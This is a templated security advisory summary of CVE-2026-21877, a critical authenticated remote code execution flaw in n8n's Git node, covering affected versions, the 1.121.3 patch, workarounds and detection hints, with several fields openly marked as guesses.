Full Report
Open-source workflow automation platform n8n has warned of a maximum-severity security flaw that, if successfully exploited, could result in authenticated remote code execution (RCE). The vulnerability, which has been assigned the CVE identifier CVE-2026-21877, is rated 10.0 on the CVSS scoring system. "Under certain conditions, an authenticated user may be able to cause untrusted code to be
Analysis Summary
# Vulnerability: Authenticated Remote Code Execution in n8n Workflow Platform
## CVE Details
- CVE ID: CVE-2026-21877
- CVSS Score: 10.0 (Critical)
- CWE: Not explicitly stated, but context suggests a code execution weakness (likely related to untrusted code execution).
## Affected Systems
- Products: n8n (Open-source workflow automation platform)
- Versions: Versions greater than or equal to 0.123.0 and less than 1.121.3
- Configurations: Affects both self-hosted and cloud versions. Requires user authentication.
## Vulnerability Description
A maximum-severity vulnerability exists where an authenticated user can cause untrusted code to be executed on the system under certain conditions. Successful exploitation leads to Remote Code Execution (RCE). This flaw appears to be tied to the use or handling of the Git node within the platform.
## Exploitation
- Status: Not explicitly stated if exploited in the wild, but PoC or confirmation of RCE capability is implied by the CVSS 10.0 score and threat description.
- Complexity: Assumed to be Low to Medium, as it requires only authentication.
- Attack Vector: Likely Network or Local (authenticated session).
## Impact
- Confidentiality: High (Potential for data exposure via RCE)
- Integrity: High (Unauthorized code execution allows modification/destruction of data)
- Availability: High (Potential for system compromise or denial of service)
## Remediation
### Patches
- Upgrade n8n to version **1.121.3** or later. (This version was released in November 2025).
### Workarounds
1. **Disable the Git node** immediately if patching is not possible. (Reference: docsvn-n8n-io/hosting/securing/blocking-nodes/)
2. **Limit access** for untrusted users to the platform.
## Detection
- Detection methods would involve monitoring system calls originating from the n8n process, especially those related to Git operations or external command execution initiated by authenticated user workflows.
- Indicators of compromise are directly related to successful RCE attempts (e.g., unexpected network connections, creation of rogue files).
## References
- Vendor Advisory: Implicit in the description detailing the fix version.
- Researcher Credit: Théo Lelasseux (@theolelasseux)
- Related Vulnerabilities Mentioned: CVE-2025-68613 (CVSS 9.9), CVE-2025-68668 (CVSS 9.9)